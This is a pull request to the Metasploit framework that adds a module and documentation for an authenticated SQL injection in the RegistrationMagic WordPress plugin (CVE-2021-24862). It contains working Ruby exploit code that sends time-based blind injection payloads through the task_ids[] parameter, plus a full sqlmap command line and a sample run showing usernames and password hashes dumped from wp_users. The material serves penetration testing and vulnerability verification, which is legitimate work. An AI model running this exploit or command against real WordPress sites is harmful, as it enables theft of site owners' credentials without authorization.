### PR TITLE
Wordpress Plugin RegistrationMagic sqli (CVE-2021-24862)

### DIFF
--- a/documentation/modules/auxiliary/scanner/http/wp_registrationmagic_sqli.md
+++ b/documentation/modules/auxiliary/scanner/http/wp_registrationmagic_sqli.md
@@ -1,0 +1,79 @@
+## Vulnerable Application
+
+RegistrationMagic, a WordPress plugin,
+prior to 5.0.1.5 is affected by an authenticated SQL injection via the
+`task_ids[]` parameter.
+
+The plugin can be downloaded
+[here](https://downloads.wordpress.org/plugin/custom-registration-form-builder-with-submission-manager.5.0.1.5.zip)
+
+This module slightly replicates sqlmap running as:
+
+```
+sqlmap -u 'http://<IP>/wp-admin/admin-ajax.php?page=rm_ex_chronos_edit_task&rm_form_id=2' --data="action=rm_chronos_ajax&rm_chronos_ajax_action=duplicate_tasks_batch&task_ids[]=2" -p "task_ids[]" --technique T -T wp_users -C user_login,user_pass --dump --dbms mysql --cookie '<cookie>'
+```
+
+## Verification Steps
+
+1. Install the plugin, use defaults
+2. Start msfconsole
+3. Do: `use auxiliary/scanner/http/wp_registrationmagic_sqli`
+4. Do: `set rhosts [ip]`
+5. Do: `run`
+6. You should get the users and hashes returned.
+
+## Options
+
+### ACTION: List Users
+
+This action lists `COUNT` users and password hashes.
+
+### COUNT
+
+If action `List Users` is selected (default), this is the number of users to enumerate.
+The larger this list, the more time it will take.  Defaults to `1`.
+
+### USERNAME
+
+The username to login with. Defaults to ``.
+
+### PASSWORD
+
+The password to login with. Defaults to ``.
+
+## Scenarios
+
+### Registration Magic 5.0.1.5 on Wordpress 5.7.5 on Ubuntu 20.04
+
+```
+[*] Processing registrationmagic.rb for ERB directives.
+resource (registrationmagic.rb)> use auxiliary/scanner/http/wp_registrationmagic_sqli
+resource (registrationmagic.rb)> set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+resource (registrationmagic.rb)> set verbose true
+verbose => true
+resource (registrationmagic.rb)> set username admin
+username => admin
+resource (registrationmagic.rb)> set password admin
+password => admin
+resource (registrationmagic.rb)> run
+[*] Checking /wp-content/plugins/custom-registration-form-builder-with-submission-manager/readme.txt
+[*] Found version 5.0.1.5 in the plugin
+[+] Vulnerable version of RegistrationMagic detected
+[*] Using formid of: 74
+[*] Enumerating Usernames and Password Hashes
+[*] {SQLi} Executing (select group_concat(GPc) from (select cast(concat_ws(';',ifnull(user_login,''),ifnull(user_pass,'')) as binary) GPc from wp_users limit 3) PfXJX)
+[*] {SQLi} Encoded to (select group_concat(GPc) from (select cast(concat_ws(0x3b,ifnull(user_login,repeat(0xc,0)),ifnull(user_pass,repeat(0x24,0))) as binary) GPc from wp_users limit 3) PfXJX)
+[*] {SQLi} Time-based injection: expecting output of length 124
+[+] wp_users
+========
+
+ user_login  user_pass
+ ----------  ---------
+ admin       $P$BZlPX7NIx8MYpXokBW2AGsN7i.aUOt0
+ admin2      $P$BNS2BGBTHmjIgV0nZWxAZtRfq1l19p1
+ editor      $P$BdWSGpy/tzJomNCh30a67oJuBEcW0K/
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```

--- a/documentation/modules/auxiliary/scanner/http/wp_registrationmagic_sqli.md
+++ b/documentation/modules/auxiliary/scanner/http/wp_registrationmagic_sqli.md
@@ -19,8 +19,10 @@ sqlmap -u 'http://<IP>/wp-admin/admin-ajax.php?page=rm_ex_chronos_edit_task&rm_f
 2. Start msfconsole
 3. Do: `use auxiliary/scanner/http/wp_registrationmagic_sqli`
 4. Do: `set rhosts [ip]`
-5. Do: `run`
-6. You should get the users and hashes returned.
+5. Do: `set username [username]`
+6. Do: `set password [password]`
+7. Do: `run`
+8. You should get the users and hashes returned.
 
 ## Options
 

--- a/modules/auxiliary/scanner/http/wp_registrationmagic_sqli.rb
+++ b/modules/auxiliary/scanner/http/wp_registrationmagic_sqli.rb
@@ -1,0 +1,121 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HTTP::Wordpress
+  include Msf::Auxiliary::Scanner
+  include Msf::Exploit::SQLi
+
+  require 'metasploit/framework/hashes/identify'
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Wordpress RegistrationMagic task_ids Authenticated SQLi',
+        'Description' => %q{
+          RegistrationMagic, a WordPress plugin,
+          prior to 5.0.1.5 is affected by an authenticated SQL injection via the
+          task_ids parameter.
+        },
+        'Author' => [
+          'h00die', # msf module
+          'Hacker5preme (Ron Jost)', # edb
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2021-24862'],
+          ['URL', 'https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24862/README.md'],
+          ['EDB', '50686'],
+        ],
+        'Actions' => [
+          ['List Users', { 'Description' => 'Queries username, password hash for COUNT users' }]
+        ],
+        'DefaultAction' => 'List Users',
+        'DisclosureDate' => '2022-01-23',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
+      )
+    )
+    register_options [
+      OptInt.new('COUNT', [false, 'Number of users to enumerate', 3]),
+      OptString.new('USERNAME', [true, 'Valid Username for login', '']),
+      OptString.new('PASSWORD', [true, 'Valid Password for login', ''])
+    ]
+  end
+
+  def run_host(ip)
+    unless wordpress_and_online?
+      vprint_error('Server not online or not detected as wordpress')
+      return
+    end
+
+    checkcode = check_plugin_version_from_readme('custom-registration-form-builder-with-submission-manager', '5.0.1.6')
+    if checkcode == Msf::Exploit::CheckCode::Safe
+      vprint_error('RegistrationMagic version not vulnerable')
+      return
+    end
+    print_good('Vulnerable version of RegistrationMagic detected')
+
+    cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
+
+    if cookie.nil?
+      vprint_error('Invalid login, check credentials')
+      return
+    end
+    formid = Rex::Text.rand_text_numeric(2)
+    vprint_status("Using formid of: #{formid}")
+    @sqli = create_sqli(dbms: MySQLi::TimeBasedBlind, opts: { hex_encode_strings: true }) do |payload|
+      d = Rex::Text.rand_text_numeric(4)
+      res = send_request_cgi({
+        'method' => 'POST',
+        'cookie' => cookie,
+        'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),
+        'vars_get' => {
+          'page' => 'rm_ex_chronos_edit_task',
+          'rm_form_id' => '2'
+        },
+        'vars_post' => {
+          'action' => 'rm_chronos_ajax',
+          'rm_chronos_ajax_action' => 'duplicate_tasks_batch',
+          'task_ids[]' => "#{formid}) AND (SELECT #{Rex::Text.rand_text_numeric(4)} FROM (SELECT(#{payload}))#{Rex::Text.rand_text_alpha(4)}) AND (#{d}=#{d}"
+        }
+      })
+      fail_with Failure::Unreachable, 'Connection failed' unless res
+    end
+
+    unless @sqli.test_vulnerable
+      print_bad("#{peer} - Testing of SQLi failed.  If this is time based, try increasing SqliDelay.")
+      return
+    end
+    columns = ['user_login', 'user_pass']
+
+    print_status('Enumerating Usernames and Password Hashes')
+    data = @sqli.dump_table_fields('wp_users', columns, '', datastore['COUNT'])
+
+    table = Rex::Text::Table.new('Header' => 'wp_users', 'Indent' => 1, 'Columns' => columns)
+    data.each do |user|
+      create_credential({
+        workspace_id: myworkspace_id,
+        origin_type: :service,
+        module_fullname: fullname,
+        username: user[0],
+        private_type: :nonreplayable_hash,
+        jtr_format: identify_hash(user[1]),
+        private_data: user[1],
+        service_name: 'Wordpress',
+        address: ip,
+        port: datastore['RPORT'],
+        protocol: 'tcp',
+        status: Metasploit::Model::Login::Status::UNTRIED
+      })
+      table << user
+    end
+    print_good(table.to_s)
+  end
+end

--- a/modules/auxiliary/scanner/http/wp_registrationmagic_sqli.rb
+++ b/modules/auxiliary/scanner/http/wp_registrationmagic_sqli.rb
@@ -64,10 +64,8 @@ class MetasploitModule < Msf::Auxiliary
 
     cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
 
-    if cookie.nil?
-      vprint_error('Invalid login, check credentials')
-      return
-    end
+    fail_with(Failure::NoAccess, 'Invalid login, check credentials') if cookie.nil?
+
     formid = Rex::Text.rand_text_numeric(2)
     vprint_status("Using formid of: #{formid}")
     @sqli = create_sqli(dbms: MySQLi::TimeBasedBlind, opts: { hex_encode_strings: true }) do |payload|


### PR DESCRIPTION
This PR adds an authenticated SQLi against RegistrationMagic plugin for Wordpress (CVE-2021-24862). Very simple to install, no configuration required. Should take no time to test.

## Verification

- [ ] Install the plugin, use defaults
- [ ] Start msfconsole
- [ ] Do: `use auxiliary/scanner/http/wp_registrationmagic_sqli`
- [ ] Do: `set rhosts [ip]`
- [ ] Do: `set username [username]`
- [ ] Do: `set password [password]`
- [ ]  Do: `run`
- [ ] You should get the users and hashes returned.
- [ ] **Document** check to make sure its good
